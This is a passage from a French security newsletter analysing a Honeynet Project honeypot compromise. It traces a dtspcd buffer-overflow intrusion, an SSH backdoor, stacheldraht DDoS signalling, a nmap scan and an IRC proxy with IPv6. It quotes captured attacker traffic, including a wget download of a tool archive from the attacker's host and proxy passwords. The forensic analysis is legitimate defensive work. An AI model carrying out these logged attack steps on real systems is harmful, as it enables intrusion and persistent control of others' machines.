les conversations ‘IRC’. Aucun autre élément ne permet d’aller plus en avant dans l’analyse.
Activité IRC N°1
01 Décembre 2003 – 13h51
Une activité ‘IRC’ est détectée à 13h51 en provenance du système ayant pour adresse ‘80.117.14.222’. Une
rapide vérification de l’allocation de celle-ci confirme qu’elle appartient au même pool d’adresses que l’adresse
‘80.117.14.44’ utilisée deux jour plus tôt.
Trame
1184
1185
1186
1188
Source
80.117.14.222
192.168.100.28
80.117.14.222
80.117.14.222
123122
80.117.14.222
Service
TCP/7000
Donnée
Paquet ‘SYN’
Paquet ‘ACK’
PASS fargetta
Paquet ‘ACK’
Cette activité est ici encore liée à l’utilisation du proxy ‘IRC’ et génère en conséquence un second trafic de 148Ko
vers le port ‘TCP/5555’ et toujours vers le serveur ‘irc-1.stealth.net’.
Trame
1213
1215
1216
1217
1225
Source
192.168.100.28
206.252.192.195
192.168.100.28
192.168.100.28
206.252.192.195
112777
192.168.100.28
Service
TCP/5555
Donnée
Paquet ‘SYN’
Paquet ‘ACK’
USER ahaa ahaa 127.0.0.1 ‘Tony-H- H :O nz’
Message ‘irc.stealth.net: 1 Welcome to the Internet Relay …’
Paquet ‘RESET’
L’analyse des conversations nous montre l’activité classique d’un canal ‘IRC’, ici le canal ‘#bobz’: papotages
divers et variés d’un groupe de pirates italiens mais a priori (nous ne lisons pas l’italien) sans grand rapport avec
le piratage. On note cependant la présence d’interlocuteurs annoncés avec une adresse IPV6 tels que :
[email protected]
DarkStar@3ffe:80ee:fd5:0:0:0:0:56
ChMoD@2001:6b8:0:400:0:0:0:31f6
Annonces ICMP
01 Décembre 2003 – 20h20
Les annonces ‘ICMP’ provenant de l’installation d’un client ‘DDoS’ en lieu et place du service ‘dtspcd’ continuent
d’être régulièrement transmises vers les systèmes ‘61.134.3.11’ et ‘217.116.38.10’. A partir de 20h20, le système
‘61.134.3.11’ se met à répondre aux sollicitations du client par le biais de réponse ‘ICMP’ contenant la chaîne
‘ficken’.
Trame
4746
4747
4984
Source
192.168.100.28
61.134.3.11
Service
ICMP
61.134.3.11
Donnée
Reply ‘skillz’
Reply ‘ficken’
Reply vide
Peu de temps après, le système compromis se met à sonder le système ‘195.130.233.20’ au moyen de quelques
4701 requêtes ‘ICMP Echo Request’.
4988
4989
4991
61.134.3.11
192.168.100.28
49366
ICMP
ICMP
Reply vide
Ping echo request à destination de ‘195.130.233.20’
ICMP
L’une des commandes ‘ficken’ transmises par le contrôleur est probablement à l’origine de ce sondage et du
sondage UDP/TCP effectué en parallèle. Nous n’avons hélas pas identifié la trame contenant cette (ces)
commande(s) en argumentant à notre décharge le volume de données à traiter (123123 trames).
On notera que la signature des commandes change régulièrement en passant par les trois valeurs: vide, ‘ficken’
et ‘niggahbitch’.
Page 59/65
Mai 2003
Trame
48524
Source
61.134.3.11
85278
61.134.3.11
Service
ICMP
Donnée
Reply ‘niggahbitch’
Reply ‘ficken’
Le lecteur pourra se reporter à l’excellente analyse de l’outil ‘stacheldraht’ proposée par David Dittrich sur la
page ‘http://staff.washington.edu/dittrich/misc/stacheldraht.analysis’.
Sondage UDP/TCP
01 Décembre 2003 – 20h41
Un sondage TCP/UDP de type ‘NULL flags’ est engagé à 20h41 à destination du système ‘javairc.tiscali.it’ ayant
pour adresse ‘195.130.233.20’. Ce sondage s’arrête à 21h58.
Trame
4990
Source
192.168.100.28
Service
TCP
Donnée
Paquet ‘NULL’
85249
192.168.100.28
TCP
Paquet ‘NULL’
Une caractéristique particulière de ce sondage réside dans la présence de paquets contenant les options de service
IP positionnées (ECN-CE et ECT), signature caractéristique de l’utilisation de l’outil ‘nmap’.
Connexion SSH N°1
01 Décembre 2003 – 23h41
Une connexion SSH d’une durée d’environ 9h est établie depuis le système ‘62.101.108.86’ à destination de la
porte dérobée ‘SSH’ active sur le port ‘TCP/5001’. L’utilisation de l’option ‘Decode as’ permet de visualiser la
nature des paquets échangés mais bien entendu, pas le contenu de la session (22Ko) !
Trame
112519
112520
112521
Source
62.101.108.86
192.168.100.28
62.101.108.86
Service
TCP/5001
Donnée
Paquet ‘SYN’
Paquet ‘ACK’
112529
112533
62.101.108.86
192.168.100.28
Annonce protocole client : ‘SSH-1.5-1.2.25’
Annonce protocole serveur: ‘%SSH-1.5-OpenSSH_3.0.p1’
112535
112542
192.168.100.28
62.101.108.86
Présentation certificat public du serveur
Négociation clef de session SSHv1
117186
117187
192.168.100.28
Paquet ‘ACK’
Echanges chiffrés
Les dernières trames de cette session correspondent à une terminaison ‘abrupte’ initiée par le serveur. Les
trames suivantes nous fourniront un indice sur l’origine de cette terminaison.
Alertes Syslog
02 Décembre 2003 – 08h44
Un filtre permet d’identifier 63 trames ‘syslog’ envoyées en interne par le système cible à destination de l’adresse
‘192.168.100.28’ correspondant à la réinitialisation du système par l’utilisateur ‘root’.
Nous avons ainsi
confirmation qu’il s’agit bien d’une plate-forme SUN Ultra 5 tournant à 360Mhz et doté de 131Mo de mémoire …
Trame
117184
Source
192.168.100.28
117334
192.168.100.28
Service
UDP/514
Donnée
Critical ‘rebooted by root’
Warning ‘mail alert …’
Nous ne pouvons que formuler une hypothèse quant au contenu de la session ‘SSH’: l’attaquant a installé un
paquetage nécessitant le redémarrage du serveur, peut être bien le module IPV6. Si tel est le cas, nous devrions
constater une activité IP V6 dans les prochaines trames.
Connexion HTTP
01 Décembre 2003 –23h56
Une activité HTTP est constatée durant la session ‘SSH’ durant laquelle le système compromis se connecte au
serveur ‘62.211.66.55’ et rapatrie le fichier ‘psy.tar’ en utilisant l’outil ‘wget’. Ce transfert, initié à 23h56 se
termine 5 heures plus tard à 5h11 du matin expliquant la durée inhabituelle de la connexion ‘SSH’ à partir de
laquelle le transfert a probablement été engagé.
Trame
112906
Source
192.168.100.28
117408
62.211.66.55
Service
TCP/80
Donnée
GET ‘/bobzz/psy.tar … User-Agent: wget/1.5.3 …’
Fin de transfert
L’extraction des données de ce flux au moyen de l’outil ‘tcpflow’ nous permet de reconstituer l’archive et
d’identifier celle-ci: il s’agit d’une nouvelle version du proxy IRC ‘PsyBNC’. La version ‘2.3.1’ est ainsi installée en
lieu et place de la version ‘2.2.1’ initialement utilisée. On notera que le séquencement des actions est concordant
puisque la première activité IRC s’est terminée avec la Trame 112777 donc juste avant la récupération du
nouveau paquetage.
Connexion SSH N°2
02 Décembre 2003 – 11h29
Une connexion SSH est de nouveau établie après le redémarrage du serveur.
Trame
117271
117272
117273
Source
62.101.108.86
192.168.100.28
62.101.108.86
Service
TCP/5001
117278
117280
62.101.108.86
192.168.100.28
Annonce protocole client : ‘SSH-1.5-1.2.25’
Annonce protocole serveur: ‘%SSH-1.5-OpenSSH_3.0.p1’
117282
192.168.100.28
Présentation certificat public du serveur
Donnée
Paquet ‘SYN’
Paquet ‘ACK’
Page 60/65
Mai 2003
117283
62.101.108.86
Négociation clef de session SSHv1
117554
117557
192.168.100.28
62.101.108.86
Paquet ‘ACK’
Echanges chiffrés
A cette étape de l’analyse, nous n’avons aucune idée des actions qui ont pu être engagées par l’attaquant mais il
est fort probable qu’il ait relancé la nouvelle version du proxy ‘PsyBNC’.
Activité IRC N°2
02 Décembre 2003 – 12h40
Une heure plus tard, une activité ‘IRC’ est de nouveau détectée toujours en provenance du même système. On
notera que le mot de passe protégeant l’accès au proxy IRC a été changé.
Trame
117558
117559
117560
117561
Source
80.117.14.222
192.168.100.28
80.117.14.222
80.117.14.222
Service
TCP/7000
Donnée
Paquet ‘SYN’
Paquet ‘ACK’
PASS campini
117605
80.117.14.222
ADDSERVER 2001:750:2:0:202:a5ff:fef0:aac7 port 6667
117745
80.117.14.222
Paquet ‘RST’
Cette activité génère en conséquence un second trafic de 118Ko à destination du port ‘TCP/6667’ du serveur
‘2001:750:2:0:202:a5ff:fef0:aac7’ par ailleurs dénommé ‘irc6.edisontel.it’. Rappelons que ce serveur avait
fait l’objet d’une conversation durant la première session IRC.
Trame
117614
117617
117618
117623
Source
192.168.100.28
2001:750:2:0…
192.168.100.28
192.168.100.28
123123
192.168.100.28
Service
TCP/6666
Donnée
Paquet ‘SYN’
Paquet ‘ACK’
Paquet ‘RESET’
L’analyse des conversations nous montre que l’attaquant commence par reconfigurer le proxy pour router le trafic
vers un serveur ‘IRC’ accessible en IP V6 puis engage une courte conversation visant probablement à vérifier le
bon fonctionnement du proxy mais aussi de la pile IP V6 installée sur le système compromis.
Un fois ce point validé, il quitte la session IRC puis se reconnecte quelque temps plus tard pour rejoindre le canal
‘capacio’ et continuer ses discussions habituelles.
Trame
119261
119262
119263
119265
Source
80.117.14.222
192.168.100.28
80.117.14.222
80.117.14.222
Service
TCP/7000
Donnée
Paquet ‘SYN’
Paquet ‘ACK’
PASS campini
119277
119279
192.168.100.28
80.117.14.222
USER ahaa bobz 192.168.100.28 -:Ownz
Message ‘irc6.edistontel.it: 1 Welcome to the Internet Relay …’
123122
80.117.14.222
Paquet ‘ACK’
On notera que durant la période de la déconnexion du client ‘IRC’, le proxy a maintenu une session ‘suspendue’
sur le serveur ‘irc6.edistontel.it’, l’interlocuteur étant simplement annoncé ‘away’.
Les objectifs de l’attaquant semblent être simplement de disposer d’un relais IRC pour ses conversations
courantes en testant la possibilité d’accéder à des serveurs fonctionnant sous IP V6. Nous ne pouvons affirmer que
l’exploitation de l’outil en déni de service est le fait de l’attaquant mais nous pensons qu’il résulte plutôt d’un effet
de bord provoqué par l’utilisation d’un ‘rootkit’ configuré par défaut.
Les systèmes suivants ont été utilisés par l’attaquant:
JOUR 1
Adresse IP
61.219.90.180
62.211.66.16
62.211.66.53
61.134.3.11
217.116.38.10
80.117.14.44
JOUR 3
Adresse IP
80.117.14.222
62.101.108.86
62.211.66.55
195.130.233.20
Nom DNS
61-219-90-180.HINET-IP.hinet.net
inconnu
inconnu
inconnu
nocfft1.etel.hu
FAI:
FAI:
FAI:
Sté:
FAI:
FAI:
Chunghwa Telecom Co. (Chine)
Telecom Italia
Telecom Italia
SNXIAN (Chine)
eTel Hungary
Telecom Italia
Utilisation
Compromission initiale
Transfert FTP de wget, …
Transfert HTTP du rootkit
Contrôleur du client DDoS
Nom DNS
inconnu
inconnu
javairc.tiscali.it
FAI:
FAI:
FAI:
FAI:
Telecom Italia
FastWeb Networks Italia
Telecom Italia
Tiscali
Utilisation
Client IRC
Connexion SSH
Transfert HTTP de ‘psy.tar’
Cible du sondage
Client IRC
Avant de répondre point par point aux questions initiales du défi, un synoptique présentant les acteurs et un
diagramme récapitulatif du séquencement de l’attaque permettra au lecteur (et au rédacteur) de reprendre ses
esprits.
Page 61/65
Mai 2003
A
Premier jour
A.B.C.D
4
80.117.14.44
pool80117.interbusiness.it
3
Systèmes probablement
compromis par l’attaquant
5
6
80.117.14.222
62.101.108.86
62.211.66.53
7a) Chat IRC
Client->Proxy
2
7
4) Transfert rootkit
sol.tar.gz
62.211.66.16
62.211.66.55
2) Transfert outils
1
8
wget, ipv6sun,...
S
61.219.90.180
HINET-IP.hinet.net
1) Attaque ‘dtspcd’
195.130.233.30
javairc.tiscali.it
5) Transfert patchs
Installation
sécurisation serveur
192.168.100.28
Pot de Miel
aka ‘Zoberius’
7b) Chat IRC
Proxy->Serveur
a
b
6) Annonces ICMP
Outil DDoS ‘stachelDraht’
61.134.3.11
Systèmes potentiellement
irc1.stleath.net
sun.com
217.116.38.10
nocfft1.etel.hu
irc6.edisontel.it
On notera que l’attaquant dispose à coup sûr de deux accès sur des systèmes - ‘61.219.90.180’ et
’44.14.pool80117.interbusiness.it’ - dont il est raisonnable de penser qu’ils aient été compromis.
A
Troisième jour
A.B.C.D
4
3
Systèmes probablement
5
80.117.14.44
80.117.14.222
1a) Chat IRC N°1
4) Connexion SSH N°1
62.101.108.86
66.211.66.53
2
Installation proxy IRC IPV6
Réinitialisation système
Client->Proxy
62.211.66.16
6
6) Connexion SSH N°2
Activation nouveau proxy
7a) Chat IRC N°2
Client->Proxy
7
62.211.66.55
1
8
S
61.219.90.180
HINET-IP.hinet.net
5) Transfert proxy IRC IIPV6
PsyBNC
192.168.100.28
Pot de Miel
aka ‘Zoberius’
195.130.233.30
javairc.tiscali.it
3) Sondage
ICMP/UDP/TCP
a
b
2) Annonces ICMP
Outil DDoS ‘stachelDraht’
61.134.3.11
Systèmes potentiellement
1b) Chat IRC N°1
7b) Chat IRC N°2
Client->Proxy
Client->Proxy
irc1.stleath.net
sun.com
217.116.38.10
nocfft1.etel.hu
irc6.edisontel.it
Deux nouveaux systèmes - ‘62.101.108.86’ et ‘222.14.pool80117.interbusiness.it’ - apparaissent ici comme
probablement compromis.
Page 62/65
Mai 2003
Réponse aux questions
Arrivé à ce niveau de l’analyse, nous disposons de la majorité des éléments permettant de répondre aux questions:
1. Quel est le système d’exploitation utilisé par le pot de miel, comment pouvez-vous le déterminer ?
Les réponses aux requêtes émises vers le service ‘dtsvcd’ nous informent:
- que le système cible est un système UNIX car ce service ‘CDE’ n’est utilisé que dans cet environnement
- et plus précisément que le système d’exploitation est un SunOS 5.8 sur une plate-forme Sun Ultra 5 ou 10.
2. Comment l’attaquant a t-il opéré pour rentrer dans le système ?
L’attaquant exploite un débordement de buffer présent dans le service ‘dtsvcd’. Il peut ainsi faire exécuter son
‘ShellCode’ sous l’autorité de ‘root’ et ouvrir un shell interactif sur le port ‘TCP/1534’. Cet accès lui permet de
télécharger les outils nécessaires ainsi qu’un ‘rootkit’.
Après exécution de ce dernier, les utilitaires d’administration sont remplacés par une version permettant de
masquer la compromission, une porte dérobée SSH est activée sur le port ‘TCP/5001’, un processus de relayage
IRC (PsyBNC) est installé dans une version obsolète mais pré-compilée pour le système cible et enfin, un outil de
déni de service distribué est activé en lieu et place du service ‘dtspcd’. On notera que les correctifs nécessaires
pour sécuriser le système sont automatiquement installés refermant ainsi la (les) brèche(s) permettant de prendre
le contrôle du système. L’attaquant est désormais sûr d’avoir le plein contrôle du système et d’être seul maître à
bord.
Après avoir papoté quelques jours sur un canal dédié d’un réseau ‘IRC’ underground, l’attaquant décide d’essayer
d’utiliser les services d’un nouveau réseau ‘IRC’ accessible en IP V6. Pour cela, il utilise la porte dérobé SSH
installé le premier jour et télécharge la dernière version du proxy ‘IRC’ ainsi que la pile IP V6. Après avoir
réinitialisé le système, il configure le proxy via la porte dérobée ‘SSH’ puis tente avec succès une connexion IP V6
sur le nouveau réseau ‘IRC’.
3. Quels ont été les systèmes utilisés durant l’attaque et comment ?
Nous proposons au lecteur de se reporter aux tableaux présentés dans les différentes conclusions intermédiaires.
4. Pouvez-vous mettre en évidence les différentes séquences de l’attaque par un diagramme ?
Les séquences engagées le premier jour sont récapitulées sur le synoptique suivant:
61.219.90.180
80.17.14.44
192.168.100.28
62.211.66.16
62.211.66.53
61.134.3.11
217.117.38.10
irc1.stealth.net
sun.com
Vuln. ‘dtspcd’
Accès Shell TCP/1524
Accès ‘shell’
Acquisition outils
Acquisition rootkit
Verrouillage accès
FTP utilitaires ‘wget’, ‘dlp’, ‘solbnc’, ‘ipv6sun’
HTTP rootkit ‘sol.tar.gz’
FTP patches SUN
Initialisation Proxy IRC
Annonce ICMP
Protocole ‘stacheldraht’
Activité IRC
Accès Proxy TCP/7000
Papotages divers et variés
Session IRC TCP/5555
Les séquences engagées le troisième jour sont récapitulées sur le synoptique suivant:
Page 63/65
Mai 2003
62.101.108.86
80.17.14.222
192.168.100.28 javairc.tiscali.it
62.211.66.65
Activité IRC
61.134.3.11
irc1.stealth.net
217.117.38.10
irc6.ediso
tel.it
Session IRC TCP/5555
Annonces ICMP
Protocole ‘stacheldraht’
Sondage TCP/UDP
Accès SSH
Porte dérobée SSH TCP/5001
HTTP proxy IRC ‘psyBNC’
Installation Proxy IRC / Module IPV6
Reboot du système
Accès SSH
Porte dérobée SSH TCP/5001
Configuration / Lancement proxy
Activité IRC
Session IRC IP V6
5. Quel est le rôle des paquets ICMP contenant la chaîne ‘skillz’ ?
Le protocole de communication entre les agents ‘stacheldraht’ et leurs contrôleurs utilise des paquets ‘ICMP’ de
type ‘Echo Reply’. La chaîne contenue dans ceux-ci est significative de l’état de la session.
Pour en savoir plus, nous recommandons la lecture de l’analyse de l’outil ‘stacheldraht’ proposée par David
Dittrich sur la page ‘http://staff.washington.edu/dittrich/misc/stacheldraht.analysis’.
6. Pouvez-vous identifier le protocole non IP activé par l’attaquant et déterminer son utilisation ?
L’attaquant a activé le protocole IP V6 sur la machine compromise rendant l’analyse plus complexe pour qui ne
dispose pas des outils ad’hoc. Il s’agit a priori d’un simple test de la part de l’attaquant visiblement intéressé par
les possibilités offertes par les réseaux ‘IRC’ IP V6.
7. Pouvez-vous identifier la nationalité de l’attaquant ?
Nous penchons pour une origine ‘Italienne’ malgré l’existence d’éléments pouvant laisser envisager une origine
chinoise (certains serveurs utilisés sont localisé en Chine), roumaine (le ‘rootkit’ est une variation d’un outil
d’attaque développé en Roumanie) ou hongroise (l’un des sites contrôleurs ‘stacheldraht’ est localise en Hongrie).
La lecture des conversations sur ‘IRC’ enlève le dernier doute …
8. Quelle est l’implication de l’utilisation d’un protocole non IP sur les technologies IDS ?
Le déploiement de plus en plus fréquent de réseaux IP version 6, et des services associés, va conduire les éditeurs
de produits IDS à mettre sur le marché des outils susceptibles de collecter et d’analyser les événements et
données transmises sur les deux supports : IP Version 4 et Version 6.
9. Quel outil existant peut être employé pour décoder ce protocole?
Les excellents outils ‘tcpdump’ et ‘Ethereal’ disposent des décodeurs ad’hoc et permettent l’analyse en temps
réel ou différé des flux échangés sur IP Version 6. Rappelons à ce propos que les systèmes d’exploitation HP-UX et
AIX intègrent une pile protocolaire IP V6 native depuis maintenant plusieurs années.
Conclusion
On retiendra de ce défi les trois points suivants:
- L’importance du service ‘IRC’ – et des réseaux non officiels - comme moyen d’information de l’attaquant mais aussi
comme support d’attaque. La surveillance permanente de ces réseaux permettrait d’être immédiatement informé des
derniers événements. Cette mesure reste hélas très difficilement réalisable de par la complexité des infrastructures
sous-jacentes et le nombre de réseaux existants. S’il peut être envisagé d’infiltrer un réseau à la suite de la
compromission d’un système (cf. défi N°27 du mois dernier), il paraît particulièrement difficile d’infiltrer la totalité
des réseaux sauf à disposer d’accès spécifiques sur les principaux nœuds de communication de l’Internet. L’absence
de tout outil d’aide à la présentation des conversations acquises rend par ailleurs le travail d’analyse fastidieux et …
quelquefois complexe.
Page 64/65
Mai 2003
- La problématique posée par l’utilisation de plus en plus fréquente par les pirates de protocoles assurant la
confidentialité des échanges au moyen d’un algorithme de chiffrement fort. La teneur des échanges ne peut plus être
analysée ni même identifiée par les systèmes de détection d’intrusion.
- La problématique posée par l’existence de la version 6 du protocole IP qui, si celle-ci est généralement ignorée des
utilisateurs finaux de l’Internet, n’en reste pas moins la version désormais utilisée dans les infrastructures centrales
– les backbones – de l’Internet.
Et pour conclure, nous laissons au lecteur le soin d’imaginer la complexité de l’analyse si le système compromis avait
été plus actif. En ce sens, les défis proposés par le projet ‘HoneyNet’ peuvent conduire à une fausse impression de
facilité alors que ceux-ci ne portent que sur des systèmes peu actifs sur lesquels la majorité des événements
journalisés correspondent aux faits et gestes de l’attaquant ….
http://project.honeynet.org/scans/scan28/
http://www.graffiti.com/services
http://linuxgov.freehomepage.com/catalog.html
- Fichiers /etc/services à jour
- Présentation de ‘PsyBNC’, site probable de l’attaquant
Page 65/65

Veille Technologique Sécurité

Transcription

Documents pareils

1190€

fiche produit

Woodlands Sun Club

AUX ETATS-UNIS Social Security 401k, 403b EN FRANCE Régime

HEBERGEMENT WEB LUXEMBOURG

Le RIV vers le format mondial - SWISSRALLY*** Championnat

tour du finistere 2015 - Tour du Finistère à la Voile

Veille Technologique Sécurité

TÜV SÜD Acertigo Compliance Services - Certificate

Veille Technologique Sécurité